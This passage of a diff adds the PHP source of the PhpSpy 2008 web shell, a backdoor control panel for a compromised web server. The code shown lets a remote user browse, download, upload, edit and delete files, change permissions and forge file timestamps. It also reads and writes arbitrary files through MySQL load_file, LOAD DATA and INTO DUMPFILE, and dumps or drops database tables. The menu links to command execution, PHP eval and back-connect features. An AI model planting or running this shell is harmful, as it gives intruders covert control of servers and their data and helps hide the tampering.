+	}
+	if ($_COOKIE['phpspypass']) {
+		if ($_COOKIE['phpspypass'] != $admin['pass']) {
+			loginpage();
+		}
+	} else {
+		loginpage();
+	}
+}
+/*===================== ÑéÖ¤½áÊø =====================*/
+
+$errmsg = '';
+
+// ²é¿´PHPINFO
+if ($action == 'phpinfo') {
+	if (IS_PHPINFO) {
+		phpinfo();
+	} else {
+		$errmsg = 'phpinfo() function has non-permissible';
+	}
+}
+
+// ÏÂÔØÎļþ
+if ($doing == 'downfile' && $thefile) {
+	if (!@file_exists($thefile)) {
+		$errmsg = 'The file you want Downloadable was nonexistent';
+	} else {
+		$fileinfo = pathinfo($thefile);
+		header('Content-type: application/x-'.$fileinfo['extension']);
+		header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+		header('Content-Length: '.filesize($thefile));
+		@readfile($thefile);
+		exit;
+	}
+}
+
+// Ö±½ÓÏÂÔر¸·ÝÊý¾Ý¿â
+if ($doing == 'backupmysql' && !$saveasfile) {
+	dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+	$table = array_flip($table);
+	$result = q("SHOW tables");
+	if (!$result) p('<h2>'.mysql_error().'</h2>');
+	$filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
+	header('Content-type: application/unknown');
+	header('Content-Disposition: attachment; filename='.$filename);
+	$mysqldata = '';
+	while ($currow = mysql_fetch_array($result)) {
+		if (isset($table[$currow[0]])) {
+			$mysqldata .= sqldumptable($currow[0]);
+		}
+	}
+	mysql_close();
+	exit;
+}
+
+// ͨ¹ýMYSQLÏÂÔØÎļþ
+if($doing=='mysqldown'){
+	if (!$dbname) {
+		$errmsg = 'Please input dbname';
+	} else {
+		dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+		if (!file_exists($mysqldlfile)) {
+			$errmsg = 'The file you want Downloadable was nonexistent';
+		} else {
+			$result = q("select load_file('$mysqldlfile');");
+			if(!$result){
+				q("DROP TABLE IF EXISTS tmp_angel;");
+				q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
+				//ÓÃʱ¼ä´ÁÀ´±íʾ½Ø¶Ï,±ÜÃâ³öÏÖ¶ÁÈ¡×ÔÉí»ò°üº¬__angel_1111111111_eof__µÄÎļþʱ²»ÍêÕûµÄÇé¿ö
+				q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
+				$result = q("select content from tmp_angel");
+				q("DROP TABLE tmp_angel");
+			}
+			$row = @mysql_fetch_array($result);
+			if (!$row) {
+				$errmsg = 'Load file failed '.mysql_error();
+			} else {
+				$fileinfo = pathinfo($mysqldlfile);
+				header('Content-type: application/x-'.$fileinfo['extension']);
+				header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+				header("Accept-Length: ".strlen($row[0]));
+				echo $row[0];
+				exit;
+			}
+		}
+	}
+}
+
+?>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gbk">
+<title><?php echo str_replace('.','','P.h.p.S.p.y');?></title>
+<style type="text/css">
+body,td{font: 12px Arial,Tahoma;line-height: 16px;}
+.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
+.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
+.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
+a {color: #00f;text-decoration:underline;}
+a:hover{color: #f00;text-decoration:none;}
+.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}
+.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}
+.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
+.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}
+.head td span{font-weight:normal;}
+form{margin:0;padding:0;}
+h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
+ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
+u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
+</style>
+<script type="text/javascript">
+function CheckAll(form) {
+	for(var i=0;i<form.elements.length;i++) {
+		var e = form.elements[i];
+		if (e.name != 'chkall')
+		e.checked = form.chkall.checked;
+    }
+}
+function $(id) {
+	return document.getElementById(id);
+}
+function goaction(act){
+	$('goaction').action.value=act;
+	$('goaction').submit();
+}
+</script>
+</head>
+<body style="margin:0;table-layout:fixed; word-break:break-all">
+<table width="100%" border="0" cellpadding="0" cellspacing="0">
+	<tr class="head">
+		<td><span style="float:right;"><a href="http://www.4ngel.net" target="_blank"><?php echo str_replace('.','','P.h.p.S.p.y');?> Ver: 2008</a></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
+	</tr>
+	<tr class="alt1">
+		<td><span style="float:right;">Safe Mode:<?php echo getcfg('safe_mode');?></span>
+			<a href="javascript:goaction('logout');">Logout</a> | 
+			<a href="javascript:goaction('file');">File Manager</a> | 
+			<a href="javascript:goaction('sqladmin');">MySQL Manager</a> | 
+			<a href="javascript:goaction('sqlfile');">MySQL Upload &amp; Download</a> | 
+			<a href="javascript:goaction('shell');">Execute Command</a> | 
+			<a href="javascript:goaction('phpenv');">PHP Variable</a> | 
+			<a href="javascript:goaction('eval');">Eval PHP Code</a>
+			<?php if (!IS_WIN) {?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php }?>
+		</td>
+	</tr>
+</table>
+<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
+<?php
+
+formhead(array('name'=>'goaction'));
+makehide('action');
+formfoot();
+
+$errmsg && m($errmsg);
+
+// »ñÈ¡µ±Ç°Â·¾¶
+!$dir && $dir = '.';
+$nowpath = getPath(SA_ROOT, $dir);
+if (substr($dir, -1) != '/') {
+	$dir = $dir.'/';
+}
+$uedir = ue($dir);
+
+if (!$action || $action == 'file') {
+
+	// Åж϶ÁдÇé¿ö
+	$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
+
+	// ɾ³ýĿ¼
+	if ($doing == 'deldir' && $thefile) {
+		if (!file_exists($thefile)) {
+			m($thefile.' directory does not exist');
+		} else {
+			m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed'));
+		}
+	}
+
+	// ´´½¨Ä¿Â¼
+	elseif ($newdirname) {
+		$mkdirs = $nowpath.$newdirname;
+		if (file_exists($mkdirs)) {
+			m('Directory has already existed');
+		} else {
+			m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
+			@chmod($mkdirs,0777);
+		}
+	}
+
+	// ÉÏ´«Îļþ
+	elseif ($doupfile) {
+		m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
+	}
+
+	// ±à¼­Îļþ
+	elseif ($editfilename && $filecontent) {
+		$fp = @fopen($editfilename,'w');
+		m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
+		@fclose($fp);
+	}
+
+	// ±à¼­ÎļþÊôÐÔ
+	elseif ($pfile && $newperm) {
+		if (!file_exists($pfile)) {
+			m('The original file does not exist');
+		} else {
+			$newperm = base_convert($newperm,8,10);
+			m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
+		}
+	}
+
+	// ¸ÄÃû
+	elseif ($oldname && $newfilename) {
+		$nname = $nowpath.$newfilename;
+		if (file_exists($nname) || !file_exists($oldname)) {
+			m($nname.' has already existed or original file does not exist');
+		} else {
+			m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
+		}
+	}
+
+	// ¸´ÖÆÎļþ
+	elseif ($sname && $tofile) {
+		if (file_exists($tofile) || !file_exists($sname)) {
+			m('The goal file has already existed or original file does not exist');
+		} else {
+			m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
+		}
+	}
+
+	// ¿Ë¡ʱ¼ä
+	elseif ($curfile && $tarfile) {
+		if (!@file_exists($curfile) || !@file_exists($tarfile)) {
+			m('The goal file has already existed or original file does not exist');
+		} else {
+			$time = @filemtime($tarfile);
+			m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
+		}
+	}
+
+	// ×Ô¶¨Òåʱ¼ä
+	elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
+		if (!@file_exists($curfile)) {
+			m(basename($curfile).' does not exist');
+		} else {
+			$time = strtotime("$year-$month-$day $hour:$minute:$second");
+			m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
+		}
+	}
+
+	// ´ò°üÏÂÔØ
+	elseif($doing == 'downrar') {
+		if ($dl) {
+			$dfiles='';
+			foreach ($dl as $filepath => $value) {
+				$dfiles.=$filepath.',';
+			}
+			$dfiles=substr($dfiles,0,strlen($dfiles)-1);
+			$dl=explode(',',$dfiles);
+			$zip=new PHPZip($dl);
+			$code=$zip->out;
+			header('Content-type: application/octet-stream');
+			header('Accept-Ranges: bytes');
+			header('Accept-Length: '.strlen($code));
+			header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
+			echo $code;
+			exit;
+		} else {
+			m('Please select file(s)');
+		}
+	}
+
+	// ÅúÁ¿É¾³ýÎļþ
+	elseif($doing == 'delfiles') {
+		if ($dl) {
+			$dfiles='';
+			$succ = $fail = 0;
+			foreach ($dl as $filepath => $value) {
+				if (@unlink($filepath)) {
+					$succ++;
+				} else {
+					$fail++;
+				}
+			}
+			m('Deleted file have finished£¬choose '.count($dl).' success '.$succ.' fail '.$fail);
+		} else {
+			m('Please select file(s)');
+		}
+	}
+
+	//²Ù×÷Íê±Ï
+	formhead(array('name'=>'createdir'));
+	makehide('newdirname');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'fileperm'));
+	makehide('newperm');
+	makehide('pfile');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'copyfile'));
+	makehide('sname');
+	makehide('tofile');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'rename'));
+	makehide('oldname');
+	makehide('newfilename');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'fileopform'));
+	makehide('action');
+	makehide('opfile');
+	makehide('dir');
+	formfoot();
+
+	$free = @disk_free_space($nowpath);
+	!$free && $free = 0;
+	$all = @disk_total_space($nowpath);
+	!$all && $all = 0;
+	$used = $all-$free;
+	$used_percent = @round(100/($all/$free),2);
+	p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.$used_percent.'%)</h2>');
+
+?>
+<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
+  <form action="" method="post" id="godir" name="godir">
+  <tr>
+    <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
+	<td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>
+    <td nowrap><input class="bt" value="GO" type="submit"></td>
+  </tr>
+  </form>
+</table>
+<script type="text/javascript">
+function createdir(){
+	var newdirname;
+	newdirname = prompt('Please input the directory name:', '');
+	if (!newdirname) return;
+	$('createdir').newdirname.value=newdirname;
+	$('createdir').submit();
+}
+function fileperm(pfile){
+	var newperm;
+	newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
+	if (!newperm) return;
+	$('fileperm').newperm.value=newperm;
+	$('fileperm').pfile.value=pfile;
+	$('fileperm').submit();
+}
+function copyfile(sname){
+	var tofile;
+	tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
+	if (!tofile) return;
+	$('copyfile').tofile.value=tofile;
+	$('copyfile').sname.value=sname;
+	$('copyfile').submit();
+}
+function rename(oldname){
+	var newfilename;
+	newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
+	if (!newfilename) return;
+	$('rename').newfilename.value=newfilename;
+	$('rename').oldname.value=oldname;
+	$('rename').submit();
+}
+function dofile(doing,thefile,m){
+	if (m && !confirm(m)) {
+		return;
+	}
+	$('filelist').doing.value=doing;
+	if (thefile){
+		$('filelist').thefile.value=thefile;
+	}
+	$('filelist').submit();
+}
+function createfile(nowpath){
+	var filename;
+	filename = prompt('Please input the file name:', '');
+	if (!filename) return;
+	opfile('editfile',nowpath + filename,nowpath);
+}
+function opfile(action,opfile,dir){
+	$('fileopform').action.value=action;
+	$('fileopform').opfile.value=opfile;
+	$('fileopform').dir.value=dir;
+	$('fileopform').submit();
+}
+function godir(dir,view_writable){
+	if (view_writable) {
+		$('godir').view_writable.value=1;
+	}
+	$('godir').dir.value=dir;
+	$('godir').submit();
+}
+</script>
+  <?php
+	tbhead();
+	p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
+	p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" /></div>');
+	p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
+	if ($view_writable) {
+		p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
+	} else {
+		p(' | <a href="javascript:godir(\''.$nowpath.'\',\'1\');">View Writable</a>');
+	}
+	p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
+	if (IS_WIN && IS_COM) {
+		$obj = new COM('scripting.filesystemobject');
+		if ($obj && is_object($obj)) {
+			$DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
+			foreach($obj->Drives as $drive) {
+				if ($drive->DriveType == 2) {
+					p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Size:'.sizecount($drive->TotalSize).'&#13;Free:'.sizecount($drive->FreeSpace).'&#13;Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
+				} else {
+					p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
+				}
+			}
+		}
+	}
+
+	p('</td></tr></form>');
+
+	p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
+
+	//²é¿´ËùÓпÉдÎļþºÍĿ¼
+	$dirdata=array();
+	$filedata=array();
+
+	if ($view_writable) {
+		$dirdata = GetList($nowpath);
+	} else {
+		// Ŀ¼Áбí
+		$dirs=@opendir($dir);
+		while ($file=@readdir($dirs)) {
+			$filepath=$nowpath.$file;
+			if(@is_dir($filepath)){
+				$dirdb['filename']=$file;
+				$dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
+				$dirdb['dirchmod']=getChmod($filepath);
+				$dirdb['dirperm']=getPerms($filepath);
+				$dirdb['fileowner']=getUser($filepath);
+				$dirdb['dirlink']=$nowpath;
+				$dirdb['server_link']=$filepath;
+				$dirdb['client_link']=ue($filepath);
+				$dirdata[]=$dirdb;
+			} else {		
+				$filedb['filename']=$file;
+				$filedb['size']=sizecount(@filesize($filepath));
+				$filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
+				$filedb['filechmod']=getChmod($filepath);
+				$filedb['fileperm']=getPerms($filepath);
+				$filedb['fileowner']=getUser($filepath);
+				$filedb['dirlink']=$nowpath;
+				$filedb['server_link']=$filepath;
+				$filedb['client_link']=ue($filepath);
+				$filedata[]=$filedb;
+			}
+		}// while
+		unset($dirdb);
+		unset($filedb);
+		@closedir($dirs);
+	}
+	@sort($dirdata);
+	@sort($filedata);
+	$dir_i = '0';
+	foreach($dirdata as $key => $dirdb){
+		if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
+			$thisbg = bg();
+			p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+			p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
+			p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
+			p('<td nowrap>'.$dirdb['mtime'].'</td>');
+			p('<td nowrap>--</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
+			p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
+			p('<td nowrap><a href="javascript:dofile(\'deldir\',\''.$dirdb['server_link'].'\',\'Are you sure will delete '.$dirdb['filename'].'? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
+			p('</tr>');
+			$dir_i++;
+		} else {
+			if($dirdb['filename']=='..') {
+				p('<tr class='.bg().'>');
+				p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
+				p('</tr>');
+			}
+		}
+	}
+
+	p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');
+	p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
+	makehide('action','file');
+	makehide('thefile');
+	makehide('doing');
+	makehide('dir',$nowpath);
+	$file_i = '0';
+	foreach($filedata as $key => $filedb){
+		if($filedb['filename']!='..' && $filedb['filename']!='.') {
+			$fileurl = str_replace(SA_ROOT,'',$filedb['server_link']);
+			$thisbg = bg();
+			p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+			p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');
+			p('<td><a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a></td>');
+			p('<td nowrap>'.$filedb['mtime'].'</td>');
+			p('<td nowrap>'.$filedb['size'].'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
+			p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
+			p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
+			p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
+			p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a> | ');
+			p('<a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Time</a>');
+			p('</td></tr>');
+			$file_i++;
+		}
+	}
+	p('<tr class="'.bg().'"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
+	p('</form></table>');
+}// end dir
+
+elseif ($action == 'sqlfile') {
+	if($doing=="mysqlupload"){
+		$file = $_FILES['uploadfile'];
+		$filename = $file['tmp_name'];
+		if (file_exists($savepath)) {
+			m('The goal file has already existed');
+		} else {
+			if(!$filename) {
+				m('Please choose a file');
+			} else {
+				$fp=@fopen($filename,'r');
+				$contents=@fread($fp, filesize($filename));
+				@fclose($fp);
+				$contents = bin2hex($contents);
+				if(!$upname) $upname = $file['name'];
+				dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+				$result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
+				m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
+			}
+		}
+	}
+?>
+<script type="text/javascript">
+function mysqlfile(doing){
+	if(!doing) return;
+	$('doing').value=doing;
+	$('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
+	$('mysqlfile').dbport.value=$('dbinfo').dbport.value;
+	$('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
+	$('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
+	$('mysqlfile').dbname.value=$('dbinfo').dbname.value;
+	$('mysqlfile').charset.value=$('dbinfo').charset.value;
+	$('mysqlfile').submit();
+}
+</script>
+<?php
+	!$dbhost && $dbhost = 'localhost';
+	!$dbuser && $dbuser = 'root';
+	!$dbport && $dbport = '3306';
+	$charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
+	formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
+	makehide('action','sqlfile');
+	p('<p>');
+	p('DBHost:');
+	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
+	p(':');
+	makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
+	p('DBUser:');
+	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
+	p('DBPass:');
+	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
+	p('DBName:');
+	makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
+	p('DBCharset:');
+	makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
+	p('</p>');
+	formfoot();
+	p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
+	p('<h2>Upload file</h2>');
+	p('<p><b>This operation the DB user must has FILE privilege</b></p>');
+	p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
+	p('<h2>Download file</h2>');
+	p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
+	makehide('dbhost');
+	makehide('dbport');
+	makehide('dbuser');
+	makehide('dbpass');
+	makehide('dbname');
+	makehide('charset');
+	makehide('doing');
+	makehide('action','sqlfile');
+	p('</form>');
+}
+
+elseif ($action == 'sqladmin') {
+	!$dbhost && $dbhost = 'localhost';
+	!$dbuser && $dbuser = 'root';
+	!$dbport && $dbport = '3306';
+	$dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
+	if(isset($dbhost)){
+		$dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
+	}
+	if(isset($dbuser)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
+	}
+	if(isset($dbpass)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
+	}
+	if(isset($dbport)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
+	}
+	if(isset($dbname)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
+	}
+	if(isset($charset)) {
+		$dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
+	}
+
+	if ($doing == 'backupmysql' && $saveasfile) {
+		if (!$table) {
+			m('Please choose the table');
+		} else {
+			dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			$table = array_flip($table);
+			$fp = @fopen($path,'w');
+			if ($fp) {
+				$result = q('SHOW tables');
+				if (!$result) p('<h2>'.mysql_error().'</h2>');
+				$mysqldata = '';
+				while ($currow = mysql_fetch_array($result)) {
+					if (isset($table[$currow[0]])) {
+						sqldumptable($currow[0], $fp);
+					}
+				}
+				fclose($fp);
+				$fileurl = str_replace(SA_ROOT,'',$path);
+				m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
+				mysql_close();
+			} else {
+				m('Backup failed');
+			}
+		}
+	}
+	if ($insert && $insertsql) {
+		$keystr = $valstr = $tmp = '';
+		foreach($insertsql as $key => $val) {
+			if ($val) {
+				$keystr .= $tmp.$key;
+				$valstr .= $tmp."'".addslashes($val)."'";
+				$tmp = ',';
+			}
+		}
+		if ($keystr && $valstr) {
+			dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
+		}
+	}
+	if ($update && $insertsql && $base64) {
+		$valstr = $tmp = '';
+		foreach($insertsql as $key => $val) {
+			$valstr .= $tmp.$key."='".addslashes($val)."'";
+			$tmp = ',';
+		}
+		if ($valstr) {
+			$where = base64_decode($base64);
+			dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
+		}
+	}
+	if ($doing == 'del' && $base64) {
+		$where = base64_decode($base64);
+		$delete_sql = "DELETE FROM $tablename WHERE $where";
+		dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+		m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
+	}
+
+	if ($tablename && $doing == 'drop') {
+		dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+		if (q("DROP TABLE $tablename")) {
+			m('Drop table of success');
+			$tablename = '';
+		} else {
+			m(mysql_error());
+		}
+	}
+
+	$charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
+
+	formhead(array('title'=>'MYSQL Manager'));
+	makehide('action','sqladmin');
+	p('<p>');
+	p('DBHost:');
+	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
+	p(':');
+	makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
+	p('DBUser:');
+	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
+	p('DBPass:');
+	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
+	p('DBCharset:');
+	makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
+	makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+?>
+<script type="text/javascript">
+function editrecord(action, base64, tablename){
+	if (action == 'del') {		
+		if (!confirm('Is or isn\'t deletion record?')) return;
+	}
+	$('recordlist').doing.value=action;
+	$('recordlist').base64.value=base64;
+	$('recordlist').tablename.value=tablename;
+	$('recordlist').submit();
+}
+function moddbname(dbname) {
+	if(!dbname) return;
+	$('setdbname').dbname.value=dbname;
+	$('setdbname').submit();
+}
+function settable(tablename,doing,page) {
+	if(!tablename) return;
+	if (doing) {
+		$('settable').doing.value=doing;
+	}
+	if (page) {
+		$('settable').page.value=page;
+	}
+	$('settable').tablename.value=tablename;
+	$('settable').submit();
+}
+</script>
+<?php
+	//²Ù×÷¼Ç¼
+	formhead(array('name'=>'recordlist'));
+	makehide('doing');
+	makehide('action','sqladmin');
+	makehide('base64');
+	makehide('tablename');
+	p($dbform);
+	formfoot();
+
+	//Ñ¡¶¨Êý¾Ý¿â
+	formhead(array('name'=>'setdbname'));
+	makehide('action','sqladmin');
+	p($dbform);
+	if (!$dbname) {
+		makehide('dbname');
+	}
+	formfoot();
+
+	//Ñ¡¶¨±í
+	formhead(array('name'=>'settable'));
+	makehide('action','sqladmin');
+	p($dbform);
+	makehide('tablename');
+	makehide('page',$page);
+	makehide('doing');
+	formfoot();
+
+	$cachetables = array();	
+	$pagenum = 30;
+	$page = intval($page);
+	if($page) {
+		$start_limit = ($page - 1) * $pagenum;
+	} else {
+		$start_limit = 0;
+		$page = 1;
+	}
+	if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
+		dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+		//»ñÈ¡Êý¾Ý¿âÐÅÏ¢
+		$mysqlver = mysql_get_server_info();
+		p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
+		$highver = $mysqlver > '4.1' ? 1 : 0;
+
+		//»ñÈ¡Êý¾Ý¿â
+		$query = q("SHOW DATABASES");
+		$dbs = array();
+		$dbs[] = '-- Select a database --';
+		while($db = mysql_fetch_array($query)) {
+			$dbs[$db['Database']] = $db['Database'];
+		}
+		makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
+		$tabledb = array();
+		if ($dbname) {
+			p('<p>');
+			p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
+			if ($tablename) {
